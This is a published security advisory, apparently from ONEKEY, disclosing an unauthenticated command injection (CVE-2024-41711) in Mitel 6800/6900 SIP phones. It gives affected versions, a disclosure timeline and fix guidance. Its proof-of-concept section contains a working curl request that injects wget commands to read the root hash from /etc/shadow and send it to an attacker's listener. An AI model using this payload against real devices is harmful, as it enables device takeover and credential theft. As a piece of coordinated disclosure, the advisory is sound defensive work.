Resources
>
Research
>
Security Advisory: Unauthenticated Command Injection in Mitel IP Phones

Security Advisory: Unauthenticated Command Injection in Mitel IP Phones

Security Advisory: Unauthenticated Command Injection in Mitel IP Phones
Denys Vozniuk
Denys Vozniuk
Security Consultant
TablE of contents

READY TO UPGRADE YOUR RISK MANAGEMENT?

Make cybersecurity and compliance efficient and effective with ONEKEY.

Book a Demo

Summary

The Mitel Series SIP Phones web administration interface executes an unauthenticated OS command constructed with unsanitized user input.

Affected Manufacturer: Mitel

Model: Mitel-6800/6900/6900w/6970

Versions: R6.4.0.HF1 (R6.4.0.136) and earlier

CVEs: CVE-2024-41711

Impact (CVSS): 8.8 (high) - AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Affected Systems

  • Mitel 6800 Series SIP Phones    R6.4.0.HF1 (R6.4.0.136) and earlier
  • Mitel 6900 Series SIP Phones R6.4.0.HF1 (R6.4.0.136) and earlier
  • Mitel 6900w Series SIP Phone R6.4.0.HF1 (R6.4.0.136) and earlier
  • Mitel 6970 Conference Unit R6.4.0.HF1 (R6.4.0.136) and earlier

Impact

By successfully exploiting this flaw, a remote unauthenticated attacker can execute arbitrary commands on the device with elevated privileges.

Description

The "webconfig" CGI binary manages the web administration interface and relies on an outdated method of input parsing. It is executed as a CGI binary of the HTTPD web server with the command:

/usr/sbin/httpd -h /webroot

This interface, which includes the “Ethernet Settings” page, processes user data without validation, allowing users to enter any input—strings, numbers, or special characters—which are then directly copied to configuration files. When users click “Save,” all entered data is written to the config file /nvdata/etc/enet.cfg and applied within the operating system as environment settings with the highest priority via the if_setup.sh up script. Additionally, attackers can exploit a concatenation bug that appends strings to the config file, enabling them to bypass string length restrictions (further details below).

Proof-Of-Concept

For this proof of concept, we'll craft an exploit that allows an attacker to read the root hash from the shadow file. To demonstrate both command injection and a string length bypass, we'll use the parameters "Router IP Address" and "Domain Name" for the attack, though an attacker could leverage any suitable parameter for their payload. Here, we input the command injection payload via the web interface, splitting it into two parts.

After pressing “Save“, you can see the following request being sent:

An attacker listening on port "4444" will receive the root hash string.

And config file - “/nvdata/etc/enet.cfg” - will looks like this:

Use the following curl command for testing, updating the IP address and Host address as needed—from “127.0.0.1” to the router’s IP address and the attacker's machine wher.

curl -i -s -k -X $'POST' \
    -H $'Host: 127.0.0.1' -H $'Content-Length: 344' \
    --data-binary $'\x0d\x0aMAIN%2FENETCFG_DHCP=on&MAIN%2FENETCFG_IPADDR=&MAIN%2FENETCFG_SUBNET=255.255.254.0&MAIN%2FENETCFG_ROUTER=%3Bwget+http%3A%2F%2F127.0.0.1&MAIN%2FENETCFG_DOMAIN=1%3A4444%2Fvers%3D%60wget+127.0.0.1%3A4444%2Fver%3D%5C%60grep+root+%2Fetc%2Fshadow%5C%60%60&MAIN%2FENETCFG_DNS1=10.136.128.11&MAIN%2FENETCFG_DNS2=1.1.1.1&MAIN%2FENETCFG_DNS3=10.10.10.10' \
    $'http://127.0.0.1/cgi-bin/webconfig?page=enetcfg&action=submit'

Takeaways

These vulnerabilities highlight significant security risks in web administration interfaces that use outdated input parsing methods. The high CVSS score (8.8) underlines the critical nature of these flaws, which allow unauthenticated remote attackers to execute arbitrary commands with elevated privileges.

If you manage or use Mitel SIP phones—or any networked devices with embedded web interfaces—it's essential to assess and test your firmware for similar issues. This includes scanning for unvalidated user input and command injection points. Organizations should regularly review and update device firmware and implement strong input sanitization to prevent unauthorized system access and data breaches.

Timeline

  • 2024-02-27: Vulnerability identified
  • 2024-03-28: Sent coordinated disclosure request to PSIRT@mitel.com
  • 2024-03-28: Received guidance on the secure communication channel from vendor
  • 2024-04-09: Sent vulnerability disclosure report to the vendor through secure communication channel
  • 2024-04-09: Vendor responded and start analysis
  • 2024-05-01: Vendor responded that we was using old version and we need to test on the version 6.4 to proove findings
  • 2024-05-14: We received latest version 6.4 and found that findings are still exist
  • 2024-05-21: We shared update for the new version with proof-of-concepts for findings
  • 2024-05-21: Vendor responded and start analysis
  • 2024-06-21: Vendor confirmed “Unauthenticated Command Injection” findings and start working on the new release, we agreed to wait for Vendors Release and Advisory
  • 2024-07-17: Vendor published Security Advisory 24-0020 for found issue
  • 2024-07-30: Vendor provided CVE number - CVE-2024-41711
Share

About Onekey

ONEKEY is the leading European specialist in Product Cybersecurity & Compliance Management and part of the investment portfolio of PricewaterhouseCoopers Germany (PwC). The unique combination of an automated Product Cybersecurity & Compliance Platform (PCCP) with expert knowledge and consulting services provides fast and comprehensive analysis, support, and management to improve product cybersecurity and compliance from product purchasing, design, development, production to end-of-life.

CONTACT:
Sara Fortmann

Marketing Manager
sara.fortmann@onekey.com

euromarcom public relations GmbH
+49 611 973 150
team@euromarcom.de

RELATED RESEARCH ARTICLES

Unblob 2024 Highlights: Sandboxing, Reporting, and Community Milestones
Critical Vulnerabilities in EV Charging Stations: Analysis of eCharge Controllers
The X in XFTP Stands For eXecute

Ready to automate your Product Cybersecurity & Compliance?

Make cybersecurity and compliance efficient and effective with ONEKEY.